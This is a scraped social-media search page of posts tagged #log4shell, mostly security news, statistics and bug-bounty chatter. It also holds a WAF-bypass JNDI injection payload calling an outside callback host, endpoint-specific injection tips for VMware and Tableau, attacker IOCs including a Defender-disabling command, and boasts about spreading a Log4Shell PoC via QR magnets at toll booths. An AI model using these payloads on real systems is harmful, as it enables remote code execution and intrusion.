#log4shell wyniki wyszukiwania
. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow
The #Log4Shell is "Not Dead" yet. It got 1st position in my methodology these days. Many organizations still uses vulnerable #Log4J in their apps. So don't let a single endpoint unchecked, scan everything. #BugBounty
In Dec 2021, the Log4Shell (CVE-2021-44228) vulnerability in Apache's Log4j shook the tech world, found by Alibaba Cloud's security team. Its ability to let attackers execute arbitrary code underscored the importance of up-to-date software. #Log4Shell
It's 2024, and a worrying trend is appearing on the Log4shell dashboard. In December, 25% of downloads of L4J were vulnerable to #log4shell - that number sits at 36% today and has been for a few weeks. We're going backwards.
Watch this video with @TonyatESET and learn not just about the latest trends in #ransomware, but also about new statistics concerning #phishing and why the #Log4Shell vulnerability remains a problem. --------------- #WeLiveSecurity #ESET #WeekinSecurity
UH OH SPICY GOT OFF HIS LAZY ASS AND FINALLY STARTED EDITING! Little sneak peek of the project I have going for YouTube, let me know what you think #infosec #cybersecurity #log4shell #Java #YouTube
⬇️ Ciberseguridad en entornos cloud ⬇️ - Gestión de logs. - Monitorización. - Atención a nuevas vulnerabilidades como #Log4Shell: ¡Parcheo! - Gestión de privilegios. 💡Descubre más en post del blog de @OVHcloud_ES: ovh.to/RLzqJFp #ciberseguridad #cloud #patrocinado
An interesting (yet short) attack path that exploited #log4shell in @VMware #vRealize and harvested an #AWS Access Key to access an @elastic #logstash instance in AWS. This was buried among 1700 hosts, executed by NodeZero with no humans involved @Horizon3ai #Pentesting #infosec
Three years after #Log4Shell caused a significant security issue, we still struggle with insecure dependencies and injection problems, join @BrianVerm @vilojona @costlow @FrankDelporte for a lively #Java #OpenJDK and beyond discussion on Foojay! foojay.io/today/foojay-p…
I used this docker image with Minecraft #Log4shell demonstration during my lectures about #cyberattacks at #gamefair2023 conference. Moreover, for victim machine, I used @ReactOS with #Java and #Minecraft server, it worked fine for proof of concept attack with calc execution.
Two years ago #Log4j (CVE-2021-44228) #vulnerability was present in many products, incl. #Minecraft. Recently, I prepared the #Docker image with vulnerable Minecraft server for demonstration of #Log4shell #exploit during my lectures malwarelab.eu/posts/log4shel… #Education #Java
I have a #Log4Shell payload on my GitHub Profile using a @ThinkstCanary Canary Token. Every once and a while I open my email and get a good chuckle 😂
The persistent threat -- why major vulnerabilities like #Log4Shell and #Spring4Shell remain significant and super dangerous, by @brianverm @snyksec, #Java and beyond: foojay.io/today/the-pers… #foojaytip
#Log4Shell & #Spring4Shell proved that we need to keep our dependencies up-to-date From package managers to bots that can create changes on repositories, there are many tools. At #GOTOcph @MaritvanDijk77 will talk about keeping your dependencies in check gotocph.com/2023
Currently infecting the I-80/90 toll road system with the #EICAR #antivirus test string and the #Log4Shell PoC string using my trusty QR code magnets! 😈
Tomorrow we'll take Indiana's I-80/90 toll route toward Chicago, displaying both the #EICAR #antivirus test string and the #Log4Shell PoC QR code magnets on the vehicle. Watch out, future DFIR aficionados!
Two years after security researchers discovered the #Log4Shell vulnerability, roughly 38% of applications still use a vulnerable version of the Apache #Log4j library. veracode.com/blog/research/…
Did you know Akamai denied over 2.5B #Log4j attack attempts in a single month? Akamai's @TonyLauro explains how #microsegmentation helped break the #Log4Shell kill chain. #SecureVibes #ZeroDay ow.ly/O2l450PHX7J
Yesterday, when I applied my QR code magnets with the #EICAR #antivirus test string and the #Log4Shell PoC, the RVers holding a party across from me asked what the QR codes do. I said "they infect toll booth databases twenty years in the future."😈 I got a few laughs!
Currently infecting the I-80/90 toll road system with the #EICAR #antivirus test string and the #Log4Shell PoC string using my trusty QR code magnets! 😈
T-2 days until my summer RV journey begins with QR code magnets for the #EICAR #antivirus test string and the #Log4shell PoC! God help databases today & in the future as I go through weigh stations, toll booths, rest stops, truck stops, hi-tech traffic intersections… 😈
Yesterday, when I applied my QR code magnets with the #EICAR #antivirus test string and the #Log4Shell PoC, the RVers holding a party across from me asked what the QR codes do. I said "they infect toll booth databases twenty years in the future."😈 I got a few laughs!
В новой статье на сайте вспомнили, что такое #Log4Shell, почему её эксплуатация оказалась такой опасной и какие выводы сделали специалисты по информационной безопасности: securitymedia.org/info/log4shell… #log4j #Java #Wannacry #CVE
¿Uff, se viene un nuevo #log4shell? Estar atentos a CVE-2022-42889 (CVSS 9.8) redpacketsecurity.com/apache-commons… juejin.cn/post/713027639… cve.report/CVE-2022-42889
. @BountyOverflow Found a bypass working for a few WAF ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} Enjoy bounty season with #log4j #Log4Shell #log4jRCE #bugbountytip credits: @BountyOverflow
Another Tip: I found this VMWare vCenter #Log4Shell vulnerability in an endpoint using POST: /analytics/telemetry/ph/api/hyper/send?_c="${payload}". This RCE method actually of CVE-2021-22005, however this ep is vulnerable to Log4Shell as well. #BugBounty --> Bounty $2100.00.
"POST /xxxx/token.oauth2" in certain endpoints found to be vulnerable to #Log4Shell (CVE-2021-44228). Just replace the username with your payload. Check below 👇tweet to verify the vulnerability. #BugBounty
I fell in love with #Log4Shell again; 4 P1s in a row. Its a simple recon and understanding where to spray the payload. This tweet is for you haters who made fun of my recent Log4Shell post. #BugBounty
I found a multiple instances of #Tableau CSP in the endpoint "/vizql/csp-report/" are vulnerable to #Log4Shell ( CVE-2021-44228). The response may depend on the targets - so test yourself. Here is the POST request if anyone wants to test: pastebin.com/es3Aidfr #BugBounty
🔺 Explotación masiva de VMWare Horizon vía #Log4Shell (CVE-2021-44228) para instalación de Minero. IP atacante: 139.99.241.160 🇦🇺 LDAP: 135.125.146.221:1389 Minero: /150.129.234.203:82/add.bat "Set-MpPreference -DisableRealtimeMonitoring $true" IOCs: github.com/CronUp/Malware…
Ox4Shell - Deobfuscate Log4Shell Payloads With Ease bit.ly/3cnwROs #Deobfuscation #Deobfuscator #Log4Shell #Ox4Shell #Oxeye
The #Log4Shell is "Not Dead" yet. It got 1st position in my methodology these days. Many organizations still uses vulnerable #Log4J in their apps. So don't let a single endpoint unchecked, scan everything. #BugBounty
Finally got my 5 months old #Log4Shell report triaged after a couple of "Need more infos" and "Not applicable", super excited🤪🤪😍😍. #BugBounty
NEW on #Log4Shell... Horde of miner bots and backdoors leveraged #Log4J to attack VMware Horizon servers 1/14
There have been over 840K attacks on companies globally, all exploiting the #Log4j (aka #Log4Shell) vulnerability. Learn more about this vulnerability: blck.by/34mUiTQ
Today marks the 3-year anniversary of the #Log4Shell PoC going public 🧑🎄 I still remember going to sleep on the 9th with a PoC I couldn’t reproduce, only to wake up the next morning to all hell breaking loose and hundreds of RCEs everywhere. Would love to hear your stories! 💸
We identified severe security issues within AWS #Log4Shell hot patch solutions. We provide a root cause analysis and overview of fixes and mitigations. bit.ly/3EqPbjd
After almost an year +multiple fixes and patches, #Log4Shell vulnerabilities are still being found, I recently found two on a single BB program. Waiting for Program owner's response after triage. So keep looking for #Log4Shell in the sub+domains. #BugBounty #bugbountytips
Something went wrong.
Something went wrong.
United States Trends
- 1. Knicks 13.3K posts
- 2. Landry Shamet 1,301 posts
- 3. #AEWDynamite 21.7K posts
- 4. #Survivor49 3,929 posts
- 5. #CMAawards 5,514 posts
- 6. Brandon Williams 1,035 posts
- 7. Derik Queen 4,276 posts
- 8. Vooch 1,155 posts
- 9. Vucevic 6,173 posts
- 10. Labaron Philon 1,113 posts
- 11. FEMA 67.5K posts
- 12. Blazers 4,181 posts
- 13. NO CAP 14.7K posts
- 14. #AEWCollision 8,725 posts
- 15. #SeeRed N/A
- 16. Coby White 1,108 posts
- 17. Naji Marshall N/A
- 18. FREE HAT 1,642 posts
- 19. Nany 2,016 posts
- 20. Chisa 30.7K posts